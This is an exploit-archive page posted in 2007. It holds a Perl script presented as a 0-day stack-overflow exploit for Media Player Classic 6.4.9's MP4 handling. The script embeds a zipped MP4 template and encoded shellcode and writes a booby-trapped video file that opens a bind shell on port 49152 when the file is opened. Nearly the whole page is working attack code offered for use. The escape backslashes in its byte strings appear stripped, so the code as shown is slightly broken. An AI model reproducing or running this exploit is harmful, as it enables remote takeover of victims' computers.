Home / exploits mpc-overflow.txt
Posted on 09 December 2007
#!/bin/perl # # Media Player Classic 6.4.9 MP4 Stack Overflow # # 0-day discovered and exploited by SYS 49152 # # Tested on win XP SP2 ENG # Shell on port 49152 # # usage: # - download this codec in order to manage MP4 content: # http://www.3ivx.com/coral/3ivx_d4_451_win.exe # # - open the MP4 file with mplayerc.exe # # SYS 49152 # gforce(put the @ here)operamail(put the . here)com # # update: # the latest 5.0.1 codec is still vulnerable use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); $zip_data = # code 724981 "x50x4Bx03x04x14x00x00x00x08x00xB3xB1x30x36xF3". "x13xD9x53x73x02x00x00x57x04x00x00x19x00x00x00". "x53x59x53x5Fx34x39x31x35x32x5Fx4Dx50x34x5Fx66". "x6Fx72x5Fx4Dx50x43x2Ex6Dx70x34x63x60x60xBFx9C". "x9Bx9Fx5FxC6xC0xC0x90x93x5Bx96x91x02xA4x19x0E". "xBCxF1x2Bx3BxF0x26x2Cx99x81x81xF9x05x88xCFxC0". "x08x46x08x80xC2xC1xE4x3Bx30xE0x05x40xD5xECxF1". "xA5x29x25x89x40x3Ax3Cx37x15x44x83x81x62x46x4A". "x4Ex11x4Cx51x6Ex4Ax66x51x62x41x41x0Ex92x3Ex76". "xADxCCx9CxE2x12x20x43x62x65x5Ex62x2Ex90x16x48". "x49x04x6Bx86x59x2FxB1xB2xBCxA8x04xABxB8x63x50". "x08x56xF1xC4x9Cx24x4Cx71x36xF3x95xC9xB9x40x73". "x98x6Fx21x8Bx4Fx40x02xACx4Cx8CxBExBAx8Cx8CxBE". "x0ExBEx0Dx37x80x04x90x62x85x50x8Cx10xCAx01x42". "x75x41xA8x06x08x55x0AxA1x58x20x14x37x84xFAxE4". "xFBx9Ax0CxD0x9Dx16xEExE0xCCxF1xB3xA4xE3xF5x84". "x41x03x5ExBFx16xCDx99xE0x3AxD1x97x95x05x12x36". "x01xBEx87x83x23x83x4Dx2Cx0Dx4Dx8Dx14x82x42x7D". "x5CxA3x14x8Dx4Fx36xBFxDCx70xF3xDDxCDx12x95x2F". "xD1x8DxC5xC2x2Bx5CxBFxEEx68x7ExFDxE7xD1x97x10". "x7DxB9xAFx0Ex7BxB8xDCxC3x55xEBxAExF4x24xD6xFD". "x9Dx72xAEx73xEFx05x17x29xE3xE7xB1x75xCFx3Bx5C". "xE4x3Ex2Ax17xD6xEDx74x2Bx31x55x64x39x68x7Ax66". "x7Dx8BxFDxD6x95xEDx72x3Ex93x05x2Fx4ExB8xBBxA0". "xEEx79x8Fx8BxDCx3Dx65xCFx7DxC6xDFx23xBFx04xAF". "xCExACx33x3Cx92xF8xF2x66x76x89xDEx1Dx65xB6xA3". "xC6x2Fx3CxEBx4Ex6Cx79x51xF7x63x81xF4x5CxB3x67". "xDEx92x2FxC2x27x4Fx7Ex7Dx4ExF7x58xD7x01xA3xB6". "xAExEFx82x5Cx19x07xFAx24x5Cx26x8Bx72xE5x7Dx3F". "x23x70x4Fx73xC5xDFx5Dx7FxF5xBFxBBx57xE8xEAx6C". "x8Cx7DxB1xC8xBDx4Ex6CxD9xEBxDFx62xDBx5ExBFx16". "xE3xCAx38xA7x6BxBAxE3x9Cx58x4DxA4xADx6ExE0xA2". "x1Bx4Dx40x39xFDxA7x2FxFFxEEx52xBDxC0xF3xE2x76". "xE0xFFx5DxCAxAFx41x6Cx5Fx9ExE2x8Fx40xF6x8Bx3F". "x82x0BxDCx2BxAExCDx8DxBFxD8xDCxF3x3Ex7Cx32x90". "xADx3CxFFxCEx39xDDx69x57x15x17xCCx7FxF1x31xC7". "xD2xD0x5Fx7FxA3xA1x57x89xA9x37xD3xEExEDx53xC3". "xD8x6Fx6AxABxDAx9Fx15x66x7Ex37xF7x54xD8xB7xC7". "xEEx77x19xB9xF2x3Ex0Bx2Dx7FxF9x53x64xFExCEx9F". "x22x0Bx5Ex86x4Fx9Dx2Bx5AxE8x60xFDx3Ax7CxF2x7C". "xF7xF0x22xAEx0Cx65x21x4ExEBx1Cx45xAExBCx5Fx40". "xFBxDCxBBx45x6FxFCxDExA5xECx5Ex01x0CxC4x52x70". "x52x4Ex4FxCDxC3x92xC4x15x4Ax8AxB2x41xE2x12x50". "x71x74xA0x90x92x59x9Cx8Dx47x5ExAAx24xB7x20x1F". "x48x0Bx41xE5x45xE1x32x92xC9x05x99xA0xDCx29x88". "x2ExC3x91x0Bx14x01x00x50x4Bx01x02x14x00x14x00". "x00x00x08x00xB3xB1x30x36xF3x13xD9x53x73x02x00". "x00x57x04x00x00x19x00x00x00x00x00x00x00x00x00". "x20x00x00x00x00x00x00x00x53x59x53x5Fx34x39x31". "x35x32x5Fx4Dx50x34x5Fx66x6Fx72x5Fx4Dx50x43x2E". "x6Dx70x34x50x4Bx05x06x00x00x00x00x01x00x01x00". "x47x00x00x00xAAx02x00x00x00x00"; my $shellcode = # code 724981 "x33xC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13". "xA8x45xF5xB8x83xEBxFCxE2xF4x54x2Fx1ExF5x40xBC". "x0Ax47x57x25x7ExD4x8Cx61x7ExFDx94xCEx89xBDxD0". "x44x1Ax33xE7x5Dx7ExE7x88x44x1ExF1x23x71x7ExB9". "x46x74x35x21x04xC1x35xCCxAFx84x3FxB5xA9x87x1E". "x4Cx93x11xD1x90xDDxA0x7ExE7x8Cx44x1ExDEx23x49". "xBEx33xF7x59xF4x53xABx69x7Ex31xC4x61xE9xD9x6B". "x74x2ExDCx23x06xC5x33xE8x49x7ExC8xB4xE8x7ExF8". "xA0x1Bx9Dx36xE6x4Bx19xE8x57x93x93xEBxCEx2DxC6". "x8AxC0x32x86x8AxF7x11x0Ax68xC0x8Ex18x44x93x15". "x0Ax6ExF7xCCx10xDEx29xA8xFDxBAxFDx2FxF7x47x78". "x2Dx2CxB1x5DxE8xA2x47x7Ex16xA6xEBxFBx16xB6xEB". "xEBx16x0Ax68xCEx2Dx35xB8xCEx16x7Cx59x3Dx2Dx51". "xA2xD8x82xA2x47x7Ex2FxE5xE9xFDxBAx25xD0x0CxE8". "xDBx51xFFxBAx23xEBxFDxBAx25xD0x4Dx0Cx73xF1xFF". "xBAx23xE8xFCx11xA0x47x78xD6x9Dx5FxD1x83x8CxEF". "x57x93xA0x47x78x23x9FxDCxCEx2Dx96xD5x21xA0x9F". "xE8xF1x6Cx39x31x4Fx2FxB1x31x4Ax74x35x4Bx02xBB". "xB7x95x56x07xD9x2Bx25x3FxCDx13x03xEEx9DxCAx56". "xF6xE3x47xDDx01x0Ax6ExF3x12xA7xE9xF9x14x9FxB9". "xF9x14xA0xE9x57x95x9Dx15x71x40x3BxEBx57x93x9F". "x47x57x72x0Ax68x23x12x09x3Bx6Cx21x0Ax6ExFAxBA". "x25xD0x47x8Bx15xD8xFBxBAx23x47x78x45xF5xB8"; open(code, ">tempzip.zip") || die "Can't Write temporary File "; binmode (code); print code $zip_data; close (code); print " Temporary file ready, patching.. "; my $zip = Archive::Zip->new(); $zip->read( 'tempzip.zip' ) ; $zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' ); open(code, "+<SYS_49152_MP4_for_MPC.mp4") || die "Can't Open temporary File "; binmode (code); seek code,619,0; print code $shellcode; close (code); print "Shellcode added, have fun! ";